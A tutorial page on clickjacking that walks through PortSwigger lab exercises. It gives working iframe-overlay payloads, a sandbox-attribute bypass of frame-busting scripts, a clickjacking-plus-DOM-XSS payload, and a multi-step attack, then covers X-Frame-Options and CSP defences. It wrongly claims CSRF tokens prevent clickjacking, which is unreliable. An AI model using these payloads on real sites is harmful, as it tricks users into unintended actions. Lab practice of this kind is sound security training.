Clickjacking

Clickjacking is an interface-based attack in which a user is tricked into clicking on actionable content on a hidden website by clicking on some other content in a decoy website.

We can give protection against this attack using a CSRF Token (A session-specific, single-use number or nonce).

Google Chrome has built-in security features and browser extensions that can help protect against clickjacking

Basic Click-jacking payload

Online Site for testing Clickjacking

https://clickjacker.io/test?url=google.com

This payload you can use as POC.

<!DOCTYPE html>
<html>
<head>
  <title>iFrame Clickjacking Demo</title>
  <style>
    iframe {
      opacity: 0.5;
      border: 5px solid red;
      position: absolute;
      top: 0;
      left: 0;
      z-index: 1000;
      width: 100%;
      height: 100%;
    }
  </style>
</head>
<body>
<script>
  window.onbeforeunload = function() {
    return "Do you want to leave?";
  };
</script>

<p>Testing for Clickjacking Vulnerability</p>



<iframe id="frame" src="<Enter URL Here>"></iframe>


</body>
</html>

You can replace the src value in an Iframe and check for a proof of concept of clickjacking. If you see a website inside the iframe, it is vulnerable to clickjacking.

Performing Click jacking using Burp Suite Professional

Testing for clickjacking - PortSwiggerBurp_Suite

Burp's Click Bandit tool is best for testing clickjacking. It generates an interactive proof of concept in seconds without writing a single line of HTML or CSS.

Clickjacking with pre-filled form data

First, identify the text field where you can add data and capture the request in burp suite.

In this case, I can see that there is an email parameter that holds a passed email value. I will pass the email ID in the URL and see if I get the value in the website reflected.

https://0a2a006604a151ab805917c000d900d1.web-security-academy.net/[email protected]

As soon, as I visited this site, It showed be email id pre-filled on the website.

Now I will make a payload for clickjacking.

<style>
    iframe {
        position:relative;
        width: 500px;
        height: 700px;
        opacity: 0.00000001;
        z-index: 2;
    }
    div {
        position:absolute;
        top:450px;
        left: 80px;
        z-index: 1;
    }
</style>
<div>Click me</div>
<iframe src="https://0a2a006604a151ab805917c000d900d1.web-security-academy.net/[email protected]"></iframe>

The above code worked perfectly.

Frame busting scripts

This is a special type of script that uses the browser to prevent clickjacking. Its main role is to ensure that the website loads in the main window and that nothing is hidden. If the script detects clickjacking, it alerts the user.

These frame buster are javascript which can be easily prevented from getting loaded by the browser. We can bypass this by using iframe with sandbox attribute.

When this is set with the allow-forms or allow-scripts values and the allow-top-navigation value is omitted then the frame buster script can be neutralized as the iframe cannot check whether or not it is the top window.

Both the allow-forms and allow-scripts values permit the specified actions within the iframe but top-level navigation is disabled. This inhibits frame busting behaviors while allowing functionality within the targeted site.

<style>
    iframe {
        position:relative;
        width: 500px;
        height: 700px;
        opacity: 0.3;
        z-index: 2;
    }
    div {
        position:absolute;
        top:450px;
        left: 80px;
        z-index: 1;
    }
</style>
<div>Click me</div>
<iframe sandbox="allow-forms" src="https://0a17005b03781af282aa2903002c0092.web-security-academy.net/[email protected]"></iframe>

Combining clickjacking with a DOM XSS attack

We can combine clickjacking and DOM XXS attacks.

Implementing this combined attack is relatively straightforward, assuming the attacker first identified the XSS exploit. The XSS exploit is then combined with the iframe target URL so that the user clicks on the button or link and consequently executes the DOM XSS attack.

First, Check which parameter is vulnerable to an XXS attack. In my case, the name field was vulnerable.

Making payload to exploit.

<style>
    iframe {
        position:relative;
        width: 500px;
        height: 900px;
        opacity: 0.3;
        z-index: 2;
    }
    div {
        position:absolute;
        top:802px;
        left: 80px;
        z-index: 1;
    }
</style>
<div>Click me</div>
<iframe src="https://0a7800a6040c51ed80a4123700470061.web-security-academy.net/feedback?&name=%3Cimg+src%3D1+onerror%3Dprint%28%29%3E&email=aa%40famil.com&subject=adfdsf&message=Tester"></iframe>

The above exploit makes use of XXS and clickjacking vulnerability.

Multiple-step clickjacking

An attacker can design a payload that forces you to click multiple times. For instance, they might trick you into making purchases on a retail site by causing you to unknowingly add several items to your shopping cart before you place an order. This is often achieved by overlaying several invisible elements or iframes on the page. However, for such an attack to work effectively and remain unnoticed, the attacker must be very precise and careful in how they implement it.

<style>
    iframe {
        position:relative;
        width: 500px;
        height: 700px;
        opacity: 0.0001;
        z-index: 2;
    }
   .firstClick, .secondClick {
		position:absolute;
		top:500px;
		left:60px;
		z-index: 1;
	}
   .secondClick {
		top:290px;
		left:200px;
	}
</style>
<div class="firstClick">Click me first</div>
<div class="secondClick">Click me next</div>
<iframe src="https://0ac2005b04c186d480f53af5005f00b5.web-security-academy.net/my-account"></iframe>

Protection against Clickjacking

It can be prevented on both the client and server sides. On the client side, we can use frame busting to prevent this. On the server side, we can use Headers to avoid this vulnerability.

Below are headers that will be helpful.

X-Frame-Options
Content Security Policy.

X-Frame-Options: DENY                # Prevents any website from loading the original website in an iframe.

X-Frame-Options: SAMEORIGIN          # Allows the original website to be framed only by pages from the same origin.

X-Frame-Options: ALLOW-FROM https://normal-website.com  # Allows only https://normal-website.com to load the original website in an iframe.

X-Frame-Options is not implemented consistently across browsers (the allow-from directive is not supported in Chrome version 76 or Safari 12 for example). However, when properly applied with Content Security Policy as part of a multi-layer defence strategy it can provide effective protection against clickjacking attacks.

Content Security Policy (CSP) is a detection and prevention mechanism that provides mitigation against attacks such as XSS and clickjacking.

Content-Security-Policy: policy # policy is a string of policy directives separated by semicolons.

CSP informs the client browser about the permitted sources for web resources, enabling it to detect and block potentially malicious behaviors.

PreviousOnline practice links NextXXS Attack

Last updated 7 months ago